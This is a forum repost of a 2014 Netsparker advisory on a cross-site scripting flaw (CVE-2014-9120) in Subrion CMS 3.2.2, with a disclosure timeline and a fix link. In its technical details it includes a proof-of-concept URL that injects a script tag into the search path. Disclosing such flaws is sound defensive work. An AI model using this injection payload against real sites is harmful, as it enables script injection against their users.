Aerosol Posted December 10, 2014 Report Posted December 10, 2014 Information--------------------Advisory by Netsparker.Name: XSS Vulnerability in Subrion CMSAffected Software : Subrion CMSAffected Versions: 3.2.2 and possibly belowVendor Homepage : http://www.subrion.org/Vulnerability Type : Cross-site ScriptingSeverity : ImportantCVE-ID: CVE-2014-9120Netsparker Advisory Reference : NS-14-039Advisory URL------------https://www.netsparker.com/xss-vulnerability-in-subrion-cms/Description--------------------Subrion CMS is a powerful PHP content management system that is veryeasy to use. It comes with a ton of great features including fullsource editing, per-page permissions, extensive plugin system, andmuch more.Technical Details--------------------Proof of Concept URLs for XSS in Subrion CMS:http://example.com/subrion/search/';"--></style></scRipt><scRipt>alert(0x003DE1)</scRipt>/For more information on cross-site scripting vulnerabilities read thefollowing articlehttps://www.netsparker.com/web-vulnerability-scanner/vulnerability-security-checks-index/crosssite-scripting-xss/Advisory Timeline--------------------29/11/2014 - First Contact03/12/2014 - Vulnerability fixed09/12/2014 - Advisory releasedSolution--------------------http://tools.subrion.org/get/latest.zipCredits & Authors--------------------These issues have been discovered by Omar Kurt while testingNetsparker Web Application Security Scanner.About Netsparker--------------------Netsparker can find and report security issues and vulnerabilitiessuch as SQL Injection and Cross-site Scripting (XSS) in all websitesand web applications regardless of the platform and the technologythey are built on. Netsparker's unique detection and exploitationtechniques allows it to be dead accurate in reporting hence it's thefirst and the only False Positive Free web application securityscanner. For more information on Netsparker visithttps://www.netsparker.com/Source Quote